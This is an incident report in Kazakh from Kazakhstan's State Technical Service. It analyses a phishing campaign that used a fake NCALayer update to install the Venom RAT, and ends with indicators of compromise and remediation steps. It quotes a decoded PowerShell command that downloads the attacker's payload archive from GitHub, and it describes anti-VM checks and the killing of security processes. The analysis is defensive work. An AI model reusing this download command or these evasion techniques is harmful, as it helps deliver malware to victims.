Мемлекеттік техникалық қызмет

Осы аптада «Мемлекеттік техникалық қызмет» АҚ-ға NCALayer бағдарламалық қамтылымды «жаңартуды» орнатуды сұраған күдікті электрондық хаттарды анықтап, алаңдаған азаматтар жүгінді. Электрондық поштадағы сілтемені басқан кезде «NCALayer.bat– жаңарту» скрипті жүктеледі, ол көп сатылы жүктеулерді бастайды, сайып келгенде бұл компьютерге Venom RAT v6.0.1 зиянды бағдарламасын орнатуға әкеп соғады.

Бұл материалда осы жағдайға байланысты зиянды бағдарламаларға техникалық талдау жасалады. Мақала ақпараттық қауіпсіздік мамандарына, инфрақұрылым қауіпсіздігін қамтамасыз ететін ақпараттық жүйелер әкімшілеріне және желілік инженерлерге, сондай-ақ Интернеттің қазақстандық сегментіндегі киберқауіпсіздік мәселелеріне қызығушылық танытатын пайдаланушыларға арналған. Материалдың соңында осы қауіпке тап болған және оның салдарын жоюға тырысқан адамдардың ұсыныстары да бар.

«NCALayer.bat-жаңартуы» бастапқы жүктеушісі

Хаттағы сілтеме hxxps://ncalayer[.]info/update.php фишингтік ресурсына бағыттап, онда «NCALayer» БҚ үшін «жаңартуды» жүктеуге және оны іске қосуға итермелеп, пайдаланушыларды жаңылыстырған. Домен а.ж. 3 қыркүйекте сағат 21:09-да құрылды. Келесі күні пайдаланушылар алғашқы күдікті хаттарды алып, олар туралы KZ-CERT Call-орталығына хабарлай бастады және бірнеше сағаттан кейін «NCALayer.bat-жаңарту» зиянкесін және оның пайдалы жүктемесін талдау жүргізілді.

«NCALayer.bat-жаңарту» пакеттік файлды іске қосқан кезде жүйе әкімшісі құқықтары бар скрипт қайта іске қосылады.

Жоғары артықшылықтарға қол жеткізілген кезде base64-те кодталған команда қамтитылған PowerShell.exe командалық түсіндірме беруші шақырылады. Оны орындау барысында GitHub репозиторийінен Netframework48 архиві жүктеледі.zip, содан кейін оның ішіндегісі %APPDATA% директориясына шығарылады (1-сурет).

1-сурет. «NCALayer.bat-жаңарту» скриптінің код блоктары

Base64-тен декодталған PowerShell ‘ a командлеті:

Invoke-WebRequest “hxxps://github[.]com/netset15/TestRepo/ raw/main/NETFramework48.zip” -OutFile “$env:APPDATA\ NETFramework48.zip” ; Expand-Archive “$env:APPDATA\ NETFramework48.zip” -DestinationPath “$env:APPDATA”

Ашылған архивте PowerShell.exe командалық түсіндірме берушінің көшірмесі бар, ол жүйеге енгізілгеннің орнына ақпаратты қорғау құралдарын айналып өту үшін пайдаланылады. Содан кейін, жүктелген PowerShell’a пайдалана отырып AES алгоритмі бойынша шифрлау процедураларын жариялау және GZip алгоритмі бойынша деректерді ашу жүргізіледі, содан кейін олар дәл сол файлдың соңындағы пайдалы жүктемеге қолданылады. Әрі қарай, ашылған деректер жадқа жүктеледі және .Net Assembly түрінде орындалады.

2-сурет. «NCALayer.bat-жаңарту» скриптінің деобфусцирленген кодының бөлігі

Пайдалы жүктеменің деобфускациясы

Мұндай жағдайларда ең құнды құрал – деректерді талдауға арналған өзіне лайық швейцариялық пышақ атағын алған CyberChef болып табылады. Бұл құралды британияның Үкіметтік байланыс орталығы (Government Communications Headquarters, GCHQ) әзірлеген, ол еркін қолжетімділікте және бүкіл әлем бойынша мыңдаған қауіпсіздік сарапшыларының жүрегін жаулап алды. Оның көмегімен артық күш жұмсамай-ақ деректерді дешифрлеуді және ашуды жасауға болады.

3-суретте түсіндірме жазулары бар CyberChef утилита экранының суреті көрсетілген. Оларды дұрыс түрлендіру үшін бағдарламалық кодта берілген әрекеттерді орындау қажет. Бірінші қадамда кіру деректері base64 алгоритмі бойынша декодталады. Содан кейін № 2 қадамда тиісті кілт пен инициализация векторы (IV) бар шифрмәтін блоктарының (CBC) тіркесуі режимінде Advanced Encryption Standard (AES) алгоритмі бойынша шифрды ашу жүргізіледі. Алдыңғы кезеңде алынған деректер ZIP алгоритмінде ашылады, содан кейін олар он алтылық форматқа түрлендіріледі. Шығу деректерінің алғашқы екі байты MZ-сигнатурасына сәйкес келетіндіктен, орындалған операциялардың дұрыстығы туралы қорытынды жасауға болады. Түсінікті болу үшін алынған РЕ32 форматындағы файлды № 1 модуль деп атаймыз.

3-сурет. № 1 пайдалы жүктеменің деобфускациясы

№ 1 модуль

Модуль РЕ32. NET форматындағы орындалатын файл болғандықтан, функционалдылықты зерттеу үшін dnSpy декомпиляторын пайдалануға болады. Бұл құрал .NET қосымшаларын зерттеуге арналған, ақысыз болып табылады және декомпилятордан басқа, бағдарламаны жөндеуге мүмкіндік береді.

dnSpy декомпиляторын және CyberChef утилитасын қолдана отырып, № 1 модульде «payload.txt» мәтіндік файл түріндегі ресурстарда сақталған модульдің шифрын ашуға, ашуға және іске қосуға арналған код бар екенін анықтауға болады. Тұтастай алғанда, функционалдылық PowerShell арқылы орындалған функционалға ұқсас болып келеді: base64-те кодталған параметрлерді шифрды ашу үшін AES алгоритмі пайдаланылады және GZip арқылы ашылады, содан кейін .NET Assembly түрінде жүктеледі.  Алынған PE32 .NET форматындағы файлды № 2 модуль деп атаймыз.

4-сурет. С# тіліндегі № 1 модуль бағдарламалық кодының бөлігі

5-сурет. Base64 алгоритмімен кодталған модуль

№ 2 модуль

Екінші модуль де сол сияқты pe32. NET форматындағы орындалатын файл болып табылады, оның функционалдығына басқа GitHub-репозиторийінен зиянды бағдарламасы бар архивті жүктеу кіреді.

6-сурет. № 2 модульдің бағдарламалық коды

Бұдан басқа, зиянды бағдарлама жүктелген файлды ағымдағы пайдаланушының автоматты жүктеуіне орнатады: HKCU\Software\ Microsoft\Windows\ CurrentVersion\Run кілтінде %APPDATA%\OSDService\Init.exe орындалатын файлын көрсететін «WinRAR32» параметрі жасалады.

Venom RAT

GitHub-тан жүктелген OSDService.zip архивінде Init.exe орындалатын файлы бар, бұл Venom RAT зиянды бағдарламасы болып табылады. Бұл зиянды бағдарлама кейлоггер мен деректерді ұрлау сияқты мол функционалдылығымен ерекшеленеді. Жиналған ақпарат %APPDATA%\MyData директориясында сақталады. Сонымен қатар, зиянкесте зақымдалған компьютерден телеметрия алу мүмкіндігі бар, оған жүйе туралы алғашқы мәліметтер (компьютердің аты, пайдаланушы аты, ОЖ түрі мен нұсқасы, ОПҚ мен графикалық процессордың саны, орнатылған бағдарламалар, соның ішінде вирусқа қарсы бағдарламалар тізімі) және пернетақта тыңшысының журналы кіреді.

7-сурет. Зақымдалған компьютерден телеметрия жіберу функциясы.

Вирусқа қарсы құмсалғыштардағы талдаудан қорғаудың болуын ерекше атап өткен жөн. Бағдарлама WMI технологиясы арқылы «Win32_OperatingSystem» класының «ProductType» мәнін алады және егер ол 3-ке тең болса, яғни серверлік ОЖ (домен контроллерін қоспағанда) болса, онда бағдарлама аяқталады. Екінші тексеру Win32_CacheMemory класы жазбаларының санын санауға негізделген – егер олар 2-ден аз болса, онда бағдарлама виртуалды машинада іске қосылып тұрғаны туралы қорытынды жасайды және өз орындалуын тоқтатады.

8-сурет. Оның белсенділігін анықтауға кедергі келтіретін Venom RAT коды

Сонымен қатар, бағдарлама “Taskmgr.exe”, “ProcessHacker.exe”, “procexp.exe”, “MSASCui.exe”, “MsMpEng.exe”, “MpUXSrv.exe”, “MpCmdRun.exe”, “NisSrv.exe”, “ConfigSecurityPolicy.exe”, “MSConfig.exe”, “Regedit.exe”, “UserAccountControlSettings.exe”, “taskkill.exe” жұмыс істеп тұрған процестерді бақылау үшін мамандар жиі қолданатын процестерді аяқтай алады.

8-сурет. Оның барысында конфигурациясы шешілетін зиянды бағдарламаны .NET-те жөндеу процесі

Осы кибершабуылдың артында тұрған зиянкестердің қолында мұндай құрал қалай пайда болды? Venom Remote Access Tool (RAT) әзірлеушісі –американдық Venom Software компаниясы оны басып енуге тестілеуді өткізу кезінде қашықтан басқару құралы ретінде жайғастырып отыр. Компанияда тіпті бағдарламаның көшірмелерін, сондай-ақ олардың бағдарламалық қамтылымын пайдалана отырып, кез-келген рұқсатсыз қол жеткізуге тікелей тыйым салатын ережелерді сатуды жүзеге асыратын веб-сайты бар.

9-сурет. Venom RAT ресми веб-сайты

Өмір бойы лицензия құны небәрі 650 АҚШ долларын, ал бір айлық жалдау ақысы 350 АҚШ долларын құрайды. Компания RAT-қа қоса, құны айына 200 АҚШ долларын құрайтын Windows негізіндегі абузға төзімді хостинг қызметтерін де ұсынады. Дегенмен, егер «Google»-дан қарап көретін болсақ, онда хакерлік форумдарда бастапқы кодпен бірге бағдарламаның бұзылған нұсқасын, оның үстіне толытай тегін болатын нұсқасын табуға болады.

10-сурет. Venom RAT-тың ресми өндірушінің веб-сайтындағы құны

11-сурет. Venom RAT-тың бұзылған нұсқасы қамтылған архивке сілтемесі бар хабарландыру

Қорытынды

«МТҚ» АҚ және мемлекеттік органдардың күшімен фишингтік ресурсқа қолжетімділік бұғатталды, содан кейін ncalayer[.]info домені толығымен бөлінді.

Дегенмен, зиянкестер күнделікті пайдаланушыны фишинг сілтемесі бойынша өтуге, зиянды кодты жүктеп алуға және іске қосуға итермелеп тұратын жаңа амалдарды ойлап табады. Корпоративтік қауіпсіздік үшін тиімді шаралардың бірі пайдаланушыларды кибергигиена негіздеріне үйрету болып табылады, бұл ағымдағы қауіптер туралы хабардарлықты арттыруға және соның салдарынан ақпараттық қауіпсіздіктің осындай оқиғаларының санын айтарлықтай азайтуға мүмкіндік береді.

Егер Сіз зиянды бағдарламалық қамтылымның құрбаны болсаңыз, онда «МТҚ» АҚ сарапшылары Сізге туындаған жағдайдан шығу жолын табуға көмектеседі. +7 (7172) 55-99-99 телефоны бойынша, 1400 ақысыз нөмірі, info@sts.kz e-mail бойынша хабарласыңыз.

Авторлар: Аскар Дюсекеев, Мухамбет Назаров, «Мемлекеттік техникалық қызмет» акционерлік қоғамының Зиянды кодты зерттеу орталығы.

Компрометация индикаторлары және осы АҚ инцидентін жою бойынша ұсынымдар.

1. Вирусқа қарсы сигнатураларды жаңарту және компьютерді сканерлеу. Егер сіз үйдегі пайдаланушы болсаңыз, DrWeb CureIt! және Kaspersky Virus Removal Tool вирусқа қарсы утилиталарды қосымша пайдалана аласыз. Анықталған қауіптерді бейтараптандыру.
2. Вирусқа қарсы құралды орталықтандырылған басқару панелінде немесе карантиннің локальдық қоймасында келтірілген бақылау сомалары бойынша анықталған қауіптер арасында іздеу жүргізу. Қауіпсіздік оқиғаларының туындау себептерін тергеуді жүргізу.
3. DLP, Active Directory топтық саясаты арқылы немесе қолмен файлдар мен директориялардың берілген тізімі, сондай-ақ тізілім кілттері мен тапсырма атаулары бойынша желіде іздеуді жүргізу. Қауіпсіздік оқиғаларының туындау себептерін тергеуді жүргізу.
4. Желіаралық экранда немесе прокси-серверде берілген IP мекенжайлар бойынша іздеу жүргізу. Қауіпсіздік оқиғаларының туындау себептерін тергеуді жүргізу.
5. Персоналды АҚ қауіптері туралы киберхабардарлық негіздеріне оқытуды жүргізу.

Бақылау сомалары:

90fc32affdfe1f78c15b7d0d0d5c2eb0

dec8d147133403aeaf4d6a3f568b96ce

11778b58e4de1518f0b10129ab1d8d0d

bee0c15caed5c45356c7fd55290a2dbf

fff67136941d5d16011e78db9e2626f43adfe3bc

1b9b17ceb20bb120c0113d90dc6e3751e50c98dc

dbb287ccafa466db2d049d3a11b791dd8d1694d7

5fdf1f9de16ad67c3a40a0b57aad8015978d4e60

63ad98fc47990e1b827a6c1b541d7a76f65722537edaef90ffde5262f30383e2

fa086d24c7d52d75a4e6725517ee3a387a9d9cd5b0275fa010e1dfd81039dc46

4876b9c55e9b29f2c4ceeaa1fb498dea8d4e4cd40356c92d23a4b15d9b70c51d

5917fd78b3281464e5231cfddfa62a26de5dcd8146eedb7b58d40bbdb4424138

Файлдар мен директориялардың аттары:

NCALayer.bat-жаңартуы

%APPDATA%\NETFramework48\install.exe

%APPDATA%\OSDService\Init.exe

%APPDATA%\NETFramework48.zip

%APPDATA%\csrsv64.zip

%APPDATA%\OSDService.zip

%APPDATA%\MyData

Тізілім:

HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System кілтінің “ConsentPromptBehaviorAdmin” параметрі

HKCU\SOFTWARE\Microsoft\Windows\ CurrentVersion\Run\ кілтінің “WinRAR32” параметрі

HKCU\SOFTWARE\Microsoft\Windows\ CurrentVersion\Run\ кілтінің “Init” параметрі

Міндет:

Init

Желі:

95.214.27[.]222

95.214.27[.]223

95.214.27[.]220